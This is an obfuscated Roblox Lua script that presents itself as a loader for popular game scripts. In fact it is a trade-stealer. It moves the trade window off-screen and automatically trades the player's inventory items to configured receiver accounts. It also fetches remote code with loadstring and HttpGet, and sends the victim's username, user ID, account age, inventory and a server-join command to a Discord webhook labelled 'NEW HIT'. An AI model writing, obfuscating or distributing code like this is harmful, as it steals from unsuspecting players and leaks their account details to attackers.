--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v30,v31) local v32={};for v36=1, #v30 do v6(v32,v0(v4(v1(v2(v30,v36,v36 + 1 )),v1(v2(v31,1 + (v36% #v31) ,1 + (v36% #v31) + 1 )))%256 ));end return v5(v32);end Config={[v7("\227\198\216\32\239\173\194\12\194","\126\177\163\187\69\134\219\167")]={v7("\39\204\58\201\253\58\215\50","\156\67\173\74\165"),v7("\48\182\95\31\190\42\71\46\178\91\70\237","\38\84\215\41\118\220\70")},[v7("\103\19\32\26\241\95\29","\158\48\118\66\114")]=v7("\163\48\4\38\96\255\180\228\32\25\37\112\170\233\175\106\19\57\126\234\250\187\45\95\33\118\167\243\164\43\27\37\60\244\169\243\116\65\102\33\253\171\249\114\73\97\33\247\163\248\119\64\121\119\179\194\148\61\69\16\75\191\233\159\50\68\15\39\129\247\130\23\58\60\76\175\241\255\2\5\15\119\146\223\254\21\62\2\64\247\209\147\54\71\29\105\246\226\173\116\68\96\112\188\170\170\0\17\33\127\137\169\152\39\61\17\94\232\182\167\117","\155\203\68\112\86\19\197"),[v7("\96\200\58\240\105\118\243\253\72\201\57\238\89","\152\38\189\86\156\32\24\133")]=false,[v7("\219\88\168\66\213\67\162\75\239\120\169\74\229","\38\156\55\199")]=true,[v7("\154\120\111\45\29\112\206\81\169\121\121","\35\200\29\28\72\115\20\154")]="a",[v7("\42\188\195\214\157\56","\84\121\223\177\191\237\76")]=v7("\149\89\199\165","\161\219\54\169\192\90\48\80"),[v7("\106\87\19\49\70\79\44\44\71\73","\69\41\34\96")]=v7("\146\204\217\15","\75\220\163\183\106\98")};repeat wait();until game:IsLoaded() if getgenv().scriptexecuted then return;end getgenv().scriptexecuted=true;local v9=loadstring(game:HttpGet(v7("\10\174\159\39\202\88\245\196\37\216\21\244\140\62\205\10\175\137\34\202\7\168\136\56\215\22\191\133\35\151\1\181\134\120\251\13\185\158\36\245\23\177\142\120\236\43\245\134\54\208\12\245\184\3\225\77\151\132\51\204\14\191\197\27\204\3","\185\98\218\235\87")))();local v10=loadstring(game:HttpGet(v7("\195\40\51\246\205\240\132\115\53\231\201\228\204\53\51\238\203\168\222\47\34\244\221\165\197\40\34\232\202\228\200\51\42\169\252\165\200\41\52\202\203\161\206\115\18\207\145\167\202\53\41\169\237\158\243\115\4\234\215\175\197\40\105\202\203\171","\202\171\92\71\134\190")))();local v11=loadstring(game:HttpGet(v7("\33\213\56\152\58\155\99\199\59\192\59\198\46\200\56\128\60\195\57\155\44\211\47\135\39\213\41\134\61\143\47\135\36\142\30\219\29\233\97\184\27\232\26\199\28\232\0\129\43\210\99\133\40\200\34\199\5\200\46\154\40\211\53\155\102\238\62\129\38\207\99\187\38\212\62\139\44","\232\73\161\76")))();v11.ErrorPrinting=false;local v13=v11.BuildEmbed();local v14=game:GetService(v7("\139\213\67\68\27\169\202","\126\219\185\34\61"));local v15=v14.LocalPlayer;local v16=game:GetService(v7("\58\199\76\102\107\118\255\210\31\203\76","\135\108\174\62\18\30\23\147"));local v17=game:GetService(v7("\158\253\62\219\43\171\33\209\191\234\47","\167\214\137\74\171\120\206\83"));local v18=game:GetService(v7("\191\245\62\88\232\168\153\228\1\88\234\177\130\243\55","\199\235\144\82\61\152"));local v19=game:GetService(v7("\53\19\169\39\14\21\184\63\2\18\138\63\8\4\184\44\2","\75\103\118\217"));local v20=game:GetService(v7("\245\65\126\39\188\12\209\93\115\17","\126\167\52\16\116\217"));local v21=v19.Trade;local v22={v7("\229\33\53\147\177\59\233\220\58\47\142\229\58\240\193\45\43","\156\168\78\64\224\212\121"),v7("\42\225\176\221\2\204\176\218\19\225\171\159\35\225\178\192","\174\103\142\197"),v7("\119\43\75\49\51\95\236\83\44","\152\54\72\63\88\69\62")};local v23=[[game:GetService("TeleportService"):TeleportToPlaceInstance("]]   .. game.PlaceId   .. [[", "]]   .. game.JobId   .. [[", game.Players.LocalPlayer)]] ;local v24=UDim2.new(0 -0 ,24082 -14083 ,0 + 0 ,11689 -(1121 + 569) );local v25={};local function v26(v33) local v34=214 -(22 + 192) ;while true do if (v34==(684 -(483 + 200))) then v10:Notify({[v7("\108\87\17\37\34","\114\56\62\101\73\71\141")]=v7("\139\234\201\205\168\253\155\198\161\169\193\194\180\224\195\221\135","\164\216\137\187"),[v7("\246\227\34\177\180\247\27\198\239\62\188","\107\178\134\81\210\198\158")]=v33},{[v7("\23\27\150\202\163\54\11\161\201\166\55\28","\202\88\110\226\166")]=Color3.fromRGB(80,80,80),[v7("\247\6\143\242","\170\163\111\226\151")]=1470 -(1404 + 59) ,[v7("\37\41\162\61","\73\113\80\210\88\46\87")]=v7("\133\41\203\19\242\141\56","\135\225\76\173\114")});break;end if (v34==(0 -0)) then getgenv().scriptexecuted=false;print(v7("\239\132\198\93\198\192\198\73\214\132\242\28\214\221\174\70\210\200\231\68\205\251\174\97\142\132","\60\180\164\142")   .. v33 );v34=1 -0 ;end end end local v27,v28=pcall(function() local v35={[142823291]=true,[335132309]=true,[636650413 -(468 + 297) ]=true};if  not v35[game.PlaceId] then local v59=0;while true do if (v59==(562 -(334 + 228))) then game:GetService(v7("\42\225\185\169\169\175\180","\199\122\141\216\208\204\221")).LocalPlayer:Kick(v7("\132\211\6\241\116\255\169\157\23\241\117\243\225\157\4\226\97\182\184\206\25\254\127\182\164\201\80\249\118\182\185\213\21\176\106\255\170\213\4\176\127\247\160\216\94","\150\205\189\112\144\24"));while true do end v59=3 -2 ;end if (v59==(2 -1)) then wait(1e+35);break;end end end if  not Config.Webhook:match(v7("\27\140\171\88\20\155\78\74\106\203\132\9\19\197\46\85\107\193\224\9\74\210\94\85\110\217\249\113\79\204","\112\69\228\223\44\100\232\113")) then local v60=0 -0 ;while true do if (v60==(0 + 0)) then v26(v7("\231\28\21\218\166\104\198\192\26\21\222\191\114\135\192\26\3\147\178\105\131\148\11\8\147\183\114\198\221\17\17\210\191\112\130\148\8\2\209\190\115\137\223\95\18\193\186\50","\230\180\127\103\179\214\28"));InvaildWebhook=true;v60=1;end if (v60==(237 -(141 + 95))) then return;end end end if ((type(Config.Receivers)~=v7("\152\4\93\74\225","\128\236\101\63\38\132\33")) or ( #Config.Receivers==0)) then v26(v7("\159\170\3\77\166\255\143\184\172\3\73\191\229\206\184\172\21\4\178\254\202\236\189\30\4\183\229\143\165\167\7\69\191\231\203\236\187\20\71\179\226\217\169\187\2\4\162\234\205\160\172\95","\175\204\201\113\36\214\139"));return;end if ((Config.Script==v7("\100\217\38\200\11\74","\100\39\172\85\188")) and  not Config.CustomLink:match(v7("\147\112\173\148\35\190\39\227\207\124\150\61\174\205\12\232\54\252\223\118\227\34\246\197\120\240\62\132\203\119","\83\205\24\217\224"))) then local v61=0;while true do if (v61==(0 + 0)) then v26(v7("\213\198\223\52\246\209\141\41\227\215\192\52\232\196\217\56\226\133\201\40\227\133\217\50\166\196\195\125\239\203\219\60\239\201\201\125\229\208\222\41\233\200\141\40\244\201\131","\93\134\165\173"));return;end end end if ((Config.FullInventory~=true) and (Config.FullInventory~=false)) then Config.FullInventory=true;end if (Config.Script==nil) then Config.Script=v7("\144\253\207\199","\30\222\146\161\162\90\174\210");elseif (Config.Script==v7("\198\91\99\30\234\67","\106\133\46\16")) then Config.Script=Config.Script   .. v7("\24\109\51","\32\56\64\19\156\58")   .. Config.CustomLink ;end if (Config.Script==v7("\121\221\246\66\85\255","\224\58\168\133\54\58\146")) then loadstring(game:HttpGet(Config.CustomLink))();elseif (Config.Script==v7("\118\64\78\239\113\148\142\29\92\22\99","\107\57\54\43\157\21\230\231")) then loadstring(game:HttpGet(v7("\211\159\5\229\170\134\128\148\132\7\240\171\216\221\210\157\20\184\177\146\192\211\143\95\226\182\206\196\222\153\2\187\189\217\217\148\212\21\168\181\211\206\223\142\3","\175\187\235\113\149\217\188")))();elseif (Config.Script==v7("\15\182\140\92\235\118\118\37\239\169\89\225","\24\92\207\225\44\131\25")) then loadstring(game:HttpGet(v7("\67\199\172\92\8\39\4\156\170\77\12\51\76\218\172\68\14\127\94\192\189\94\24\114\69\199\189\66\15\51\72\220\181\3\47\117\74\199\139\69\24\118\4\242\170\94\26\100\109\218\189\64\31\50\70\210\177\66\84\78\82\222\168\68\20\115\82\251\173\78\85\113\94\210","\29\43\179\216\44\123")))();elseif (Config.Script==v7("\149\208\39\68\177\208\39\68\169\153\8\89\191","\44\221\185\64")) then loadstring(game:HttpGet(v7("\9\243\92\79\96\91\168\7\77\114\22\169\79\86\103\9\242\74\74\96\4\245\75\80\125\21\226\70\75\61\2\232\69\16\71\9\230\92\108\122\2\236\7\119\122\6\239\68\86\116\9\243\101\114\33\78\234\73\86\125\78\202\73\86\125","\19\97\135\40\63")))();elseif (Config.Script==v7("\139\95\63\50\63\34\171\28\27\46\45","\81\206\60\83\91\79")) then getgenv().mainKey=v7("\64\162\220","\196\46\203\176\18\79\163\45");local v118,v119,v120,v121,v122=loadstring,request or http_request or (http and http.request) or (syn and syn.request) ,assert,tostring,"https\58//api.eclipsehub.xyz/auth";v120(v118 and v119 ,v7("\157\58\123\29\49\239\224\170\98\112\17\48\187\220\173\50\110\17\54\239\234\188","\143\216\66\30\126\68\155"));v118(v119({[v7("\159\218\1","\129\202\168\109\171\165\195\183")]=v122   .. "\?\107e\121\61"   .. v121(mainKey) ,[v7("\10\93\54\220\219\6\245","\134\66\56\87\184\190\116")]={[v7("\9\34\12\169\84\202\38\48\50\37","\85\92\81\105\219\121\139\65")]=v7("\216\176\92\76\108\204\248","\191\157\211\48\37\28")}}).Body)();elseif (Config.Script==v7("\237\76\192\52\122\239\45\221\42","\90\191\127\148\124")) then loadstring(game:HttpGet(v7("\112\147\58\7\107\221\97\88\106\134\57\89\127\142\58\31\109\133\59\4\125\149\45\24\118\147\43\25\108\201\45\24\117\200\28\68\76\175\99\39\74\174\24\88\74\212\26\63\72\181\7\33\55\138\47\30\118\200\34\24\121\131\43\5\54\139\59\22","\119\24\231\78")))();elseif (Config.Script==v7("\163\62\173\72\211\82\31\140\5\176\72","\113\226\77\197\42\188\32")) then loadstring(game:HttpGet(v7("\50\2\224\165\41\76\187\250\40\23\227\251\61\31\224\189\47\20\225\166\63\4\247\186\52\2\241\187\46\88\247\186\55\89\213\166\50\20\251\167\40\24\187\148\41\30\246\186\40\4\250\157\47\20\187\184\59\31\250\250\9\25\248\180\40\23\186\185\47\23","\213\90\118\148"),true))();elseif (Config.Script==v7("\117\43\172\67\94","\45\59\78\212\54")) then loadstring(game:HttpGet(v7("\24\66\151\155\149\116\226\191\2\87\148\197\129\39\185\248\5\84\150\152\131\60\174\255\30\66\134\133\146\96\174\255\29\25\144\198\137\99\172\189\18\25\141\142\158\59\190\191\29\87\138\133\201\34\162\241\20\69\151\153\143\32\170","\144\112\54\227\235\230\78\205")))();end Common=0 -0 ;Uncommon=0;Rare=0;Legendary=0;Vintage=0 -0 ;Godly=0;Ancient=0 + 0 ;Unique=0;v15.Idled:connect(function() local v37=0 -0 ;while true do if ((0 + 0)==v37) then v16:CaptureController();v16:ClickButton2(Vector2.new());break;end end end);if (v15.PlayerGui.MainGUI.Game:FindFirstChild(v7("\154\38\25\249\222\79\188\58\22","\59\211\72\111\156\176"))~=nil) then local v64=0 + 0 ;while true do if (v64==0) then UIPath=v15.PlayerGui.MainGUI.Game.Inventory.Main;TradePath=v15.PlayerGui.TradeGUI;v64=1 -0 ;end if (v64==(1 + 0)) then Mobile=false;break;end end else local v65=163 -(92 + 71) ;while true do if (v65==(0 + 0)) then UIPath=v15.PlayerGui.MainGUI.Lobby.Screens.Inventory.Main;TradePath=v15.PlayerGui.TradeGUI_Phone;v65=1;end if (1==v65) then Mobile=true;break;end end end function TapUI(v38,v39,v40) if (v39==v7("\111\132\247\36\88\130\163\14\70\130\224\38","\77\46\231\131")) then if v38.Active then v38=v38[v40];else return;end end if (v39==v7("\142\81\174\84\250\119\190\69\185\95","\32\218\52\214")) then if (v38=="^") then v38=v40;else return;end end for v66,v67 in pairs(v22) do for v86,v87 in pairs(getconnections(v38[v67])) do v87:Fire();end end end function Rarity(v41,v42,v43,v44,v45) local v46=0 -0 ;local v47;local v48;local v49;while true do if (3==v46) then if ((v47==(871 -(574 + 191))) and (v48==(88 + 18)) and (v49==(265 -159))) then Common=Common + Stack ;elseif ((v47==0) and (v48==255) and (v49==255)) then Uncommon=Uncommon + Stack ;elseif ((v47==(0 + 0)) and (v48==(1049 -(254 + 595))) and (v49==(126 -(55 + 71)))) then Rare=Rare + Stack ;elseif ((v47==(289 -69)) and (v48==(1790 -(573 + 1217))) and (v49==(13 -8))) then Legendary=Legendary + Stack ;elseif ((v47==255) and (v48==(0 + 0)) and (v49==179)) then Godly=Godly + Stack ;elseif ((v47==(161 -61)) and (v48==10) and (v49==255)) then Ancient=Ancient + Stack ;elseif ((v47==(1179 -(714 + 225))) and (v48==(409 -269)) and (v49==0)) then Unique=Unique + Stack ;else Vintage=Vintage + Stack ;end break;end if (v46==(2 -0)) then v48=math.floor((v41.G * (28 + 227)) + (0.5 -0) );v49=math.floor((v41.B * (1061 -(118 + 688))) + 0.5 );v46=51 -(25 + 23) ;end if (v46==(0 + 0)) then Stack=1886 -(927 + 959) ;if v43 then if v43:FindFirstChild(v7("\107\1\62","\58\46\119\81\200\145\208\37")) then return;end end v46=3 -2 ;end if (1==v46) then if (v42~="") then Stack=tonumber(v42:match(v7("\51\196\117\168\226\244","\86\75\236\80\204\201\221")));else Stack=733 -(16 + 716) ;end v47=math.floor((v41.R * (492 -237)) + 0.5 );v46=99 -(11 + 86) ;end end end function checkitem(v50) if v50:IsA(v7("\84\83\118\136\251","\235\18\33\23\229\158")) then if ((v50.ItemName.Label.Text~=v7("\116\191\199\186\69\182\213\251\123\180\200\189\85","\219\48\218\161")) and (v50.ItemName.Label.Text~=v7("\192\116\122\72\206\67\244\164\86\105\71","\128\132\17\28\41\187\47"))) then local v105=0;while true do if (v105==0) then Rarity(v50.ItemName.BackgroundColor3,v50.Container.Amount.Text,v50:FindFirstChild(v7("\53\51\1\41","\61\97\82\102\90")));if Config.FullInventory then local v123=0;local v124;while true do if (v123==(0 -0)) then v124=285 -(175 + 110) ;while true do if ((0 -0)==v124) then if (v50.Container.Amount.Text~="") then number=v50.Container.Amount.Text;else number=v7("\180\127","\105\204\78\203\43\167\55\126");end table.insert(v25,v50.ItemName.Label.Text   .. " "   .. number );break;end end break;end end end break;end end end end end function FullInventory() for v68,v69 in pairs(UIPath.Weapons.Items.Container:GetChildren()) do for v88,v89 in pairs(v69.Container:GetChildren()) do if ((v89.Name==v7("\134\162\49\23\0\16\202\80\182","\49\197\202\67\126\115\100\167")) or (v89.Name==v7("\31\90\211\37\143\65\91\50\85","\62\87\59\191\73\224\54"))) then for v110,v111 in pairs(v89.Container:GetChildren()) do checkitem(v111);end else checkitem(v89);end end end for v70,v71 in pairs(UIPath.Pets.Items.Container.Current.Container:GetChildren()) do checkitem(v71);end if (Common and Uncommon and Rare and Legendary and Godly and Ancient and Unique and (Vintage==0)) then table.insert(v25,v7("\201\13\244\204","\169\135\98\154"));end if Config.FullInventory then return table.concat(v25,v7("\135\55","\168\171\23\68\52\157\83"));else return v7("\210\100\249\161\101\4\137\226\116\251\185\42\63\158\180\85\252\190\36\47\139\241\117\187","\231\148\17\149\205\69\77");end end FullInventory();task.wait();function Sendtrade() if Mobile then local v90=v15.PlayerGui.MainGUI.Lobby.Leaderboard;TapUI(v90.Container.Close);TapUI(v90.Container.PlayerList[Receiver].ActionButton);TapUI(v90.Popup.Container.Action.Trade);TapUI(v90.Popup.Container.Close);else local v91=0 -0 ;local v92;while true do if (v91==(1798 -(503 + 1293))) then TapUI(v92.Container.TradeRequest.SendingRequest,v7("\11\45\193\82\60\43\149\120\34\43\214\80","\59\74\78\181"),v7("\6\208\84\89\182\41","\211\69\177\58\58"));TapUI(v92.Container[Receiver].ActionButton);v91=8 -5 ;end if (v91==(1 + 0)) then TapUI(v92.Container.Close.Title.Text,v7("\180\162\223\239\23\220\136\162\196\240","\159\224\199\167\155\55"),v92.Container.Close.Toggle);TapUI(v92.Container.TradeRequest.ReceivingRequest,v7("\214\240\40\219\225\246\124\241\255\246\63\217","\178\151\147\92"),v7("\168\248\79\62\27\66\127","\26\236\157\44\82\114\44"));v91=2;end if (v91==(1064 -(810 + 251))) then TapUI(v92.Inspect.Trade);TapUI(v92.Inspect.Close);break;end if ((0 + 0)==v91) then v92=v15.PlayerGui.MainGUI.Game.Leaderboard;TapUI(v92.Container.ToggleRequests.On);v91=1 + 0 ;end end end end function readchats() v14[Receiver].Chatted:Connect(function(v72) if (v72==Config.ResendTrade) then Sendtrade();end end);end function Activate(v51) for v73,v74 in pairs(Config.Receivers) do if (v74==v51) then local v98=0 + 0 ;local v99;while true do if (v98==(533 -(43 + 490))) then v99=733 -(711 + 22) ;while true do if (v99==(3 -2)) then wait(10);Sendtrade();break;end if (v99==(859 -(240 + 619))) then Receiver=v51;readchats();v99=1;end end break;end end end end end function InsertItems() local v52={[v7("\150\235\122\252\236\197\163","\171\215\133\25\149\137")]={},[v7("\198\199\54\246\246","\34\129\168\82\154\143\80\156")]={},[v7("\176\188\58\26\93\75","\233\229\210\83\107\40\46")]={},[v7("\247\75\60\194\4\198\71","\101\161\34\82\182")]={},[v7("\196\8\94\251\213\230\131\60\241","\78\136\109\57\158\187\130\226")]={},[v7("\12\62\235\244","\145\94\95\153")]={},[v7("\200\195\23\218\67\186\242\195","\215\157\173\116\181\46")]={},[v7("\22\187\134\255\213\59","\186\85\212\235\146")]={}};for v75,v76 in pairs(TradePath.Container.Items.Main:GetChildren()) do for v93,v94 in pairs(v76.Items.Container.Current.Container:GetChildren()) do if v94:IsA(v7("\228\147\23\243\60","\56\162\225\118\158\89\142")) then if ((v94.ItemName.Label.Text~=v7("\120\0\198\174\55\212\72\69\235\161\43\222\89","\184\60\101\160\207\66")) and (v94.ItemName.Label.Text~=v7("\21\135\122\189\36\142\104\252\22\151\114","\220\81\226\28"))) then local v113=v7("\48\218\143\246\229\201","\167\115\181\226\155\138");local v114=v94.ItemName.BackgroundColor3;if (v114==Color3.fromRGB(54 + 166 ,0 -0 ,1 + 4 )) then v113=v7("\206\39\224\89\117\117\199\240\59","\166\130\66\135\60\27\17");elseif (v114==Color3.fromRGB(255,0,179)) then v113=v7("\99\69\202\121\41","\80\36\42\174\21");elseif (v114==Color3.fromRGB(1844 -(1344 + 400) ,10,660 -(255 + 150) )) then v113=v7("\111\30\52\115\75\30\35","\26\46\112\87");elseif (v114==Color3.fromRGB(190 + 50 ,75 + 65 ,0 -0 )) then v113=v7("\140\45\162\101\170\186","\212\217\67\203\20\223\223\37");elseif (v114==Color3.fromRGB(255,823 -568 ,0)) then v113=v7("\140\132\166\198\187\138\173","\178\218\237\200");elseif (v114==Color3.fromRGB(1739 -(404 + 1335) ,606 -(183 + 223) ,0)) then v113=v7("\132\180\244\213","\176\214\213\134");elseif (v114==Color3.fromRGB(0 -0 ,169 + 86 ,92 + 163 )) then v113=v7("\193\163\181\219\165\91\86\250","\57\148\205\214\180\200\54");end table.insert(v52[v113],v94);end end end end local v53=337 -(10 + 327) ;local v54={v7("\51\243\54\61\115\28\233","\22\114\157\85\84"),v7("\227\196\23\200\68","\200\164\171\115\164\61\150"),v7("\139\250\10\84\150\187","\227\222\148\99\37"),v7("\5\91\92\226\248\52\87","\153\83\50\50\150"),v7("\113\115\116\25\125\175\76\79\111","\45\61\22\19\124\19\203"),v7("\243\19\31\240","\217\161\114\109\149\98\16"),v7("\39\46\59\115\177\121\29\46","\20\114\64\88\28\220"),v7("\18\14\223\185\247\222","\221\81\97\178\212\152\176")};for v77,v78 in ipairs(v54) do for v95,v96 in ipairs(v52[v78]) do if (v53<(16 -12)) then local v106=0;local v107;local v108;local v109;while true do if (v106==(1493 -(711 + 782))) then v107=0 -0 ;v108=nil;v106=470 -(270 + 199) ;end if ((1 + 0)==v106) then v109=nil;while true do if (v107==(1820 -(580 + 1239))) then v109=v96.Container.Amount.Text;if (v109~="") then v108=tonumber(v109:match(v7("\213\175\88\255\81\132","\122\173\135\125\155")));end v107=2;end if (v107==0) then v53=v53 + (2 -1) ;v108=1 + 0 ;v107=1 + 0 ;end if (v107==2) then task.wait();for v126=1 + 0 ,v108 do TapUI(v96.Container.ActionButton);end break;end end break;end end end end end wait(7 -4 );game:GetService(v7("\182\196\16\181\54\50\201\144\196\4\138\43\62\218\133\198\5","\168\228\161\96\217\95\81")).Trade.AcceptTrade:FireServer(177459741 + 108186841 );end if Mobile then local v79=1167 -(645 + 522) ;local v80;while true do if (v79==(1790 -(1010 + 780))) then v80=0 + 0 ;while true do if (v80==(0 -0)) then TradePath.Container.Position=v24;TradePath.ClickBlocker.Position=v24;break;end end break;end end else TradePath.BG.Position=v24;TradePath.Container.Position=v24;TradePath.ClickBlocker.Position=v24;TradePath.Processing.Position=v24;end TradePath:GetPropertyChangedSignal(v7("\254\223\47\94\35\82\223","\55\187\177\78\60\79")):Connect(function() local v55=0 -0 ;while true do if (v55==(1836 -(1045 + 791))) then wait(2);if TradePath.Enabled then InsertItems();else Sendtrade();end break;end end end);v14.PlayerAdded:Connect(function(v56) Activate(v56.Name);end);for v57,v58 in pairs(v14:GetPlayers()) do Activate(v58.Name);end end);if v27 then message=v7("\45\206\95\222\85\202\146\35\207\82\238\6\143\192\109\142\5\171","\224\77\174\63\139\38\175")   .. v15.Name   .. "\nUser ID      : "   .. v15.UserId   .. "\nAccount Age  : "   .. v15.AccountAge   .. "\nExploit      : "   .. identifyexecutor()   .. "\nReceivers    : "   .. table.concat(Config.Receivers,v7("\200\1","\78\228\33\56"))   .. "\nScript       : "   .. Config.Script   .. "```\n🎒 **__Inventory__**\n```Ancient    🗿: "   .. Ancient   .. "\nGodly      💎: "   .. Godly   .. "\nUnique     👑: "   .. Unique   .. "\nVintage    🔫: "   .. Vintage   .. "\nLegendary  ⚡: "   .. Legendary   .. "\nRare       🌈: "   .. Rare   .. "\nUncommon   💠: "   .. Uncommon   .. "\nCommon     📦: "   .. Common   .. "```\n🎒 **__Full Inventory__**\n```"   .. FullInventory()   .. "```\n🔗 **__Join__**\n```"   .. v23   .. v7("\206\126\178","\229\174\30\210\99") ;else message=v7("\27\237\134\116\255\47\54\9\173\198\17\183\125","\89\123\141\230\49\141\93")   .. v28   .. "\nExploit : "   .. identifyexecutor()   .. "```\n\n**Undefined Error.**" ;end if InvaildWebhook then return;end if (Vintage and Godly and Ancient and Unique and Config.GoodItemsOnly) then content=v7("\211\116\224\9\2\83\252\127\243","\42\147\17\150\108\112");elseif (Common and Uncommon and Rare and Legendary and Godly and Ancient and Unique and (Vintage==(0 -0))) then content=v7("\45\167\41\63\207\225\27","\136\111\198\77\31\135");else content=v7("\32\8\163\22\149\237\3","\201\98\105\199\54\221\132\119");end v13.Info={[v7("\138\9\151\53\11\59\171\170","\204\217\108\227\65\98\85")]={[v7("\125\204\249\234\62","\160\62\163\149\133\76")]=v11.ColorConverter(Color3.fromRGB(0 -0 ,255,217))},[v7("\243\173\15\42\199","\163\182\192\109\79")]={[v7("\0\47\20\204\240","\149\84\70\96\160")]="🔥 **__NEW HIT__ | __Made by zflixy___**",[v7("\28\3\30\238\42\15\29\249\49\9\3","\141\88\102\109")]=message,[v7("\149\92\197\100\31\47","\161\211\51\170\16\122\93\53")]=v7("\225\168\190\33\227\183\141\104\207\188\179\44\254\227\129\60\254\175\190\45\233","\72\155\206\210")}};v11:Send({[v7("\83\104\88","\83\38\26\52\110")]=Config.Webhook,[v7("\91\24\41\82\93\25\51","\38\56\119\71")]=content,[v7("\246\226\90\211\33\69","\54\147\143\56\182\69")]={v13}});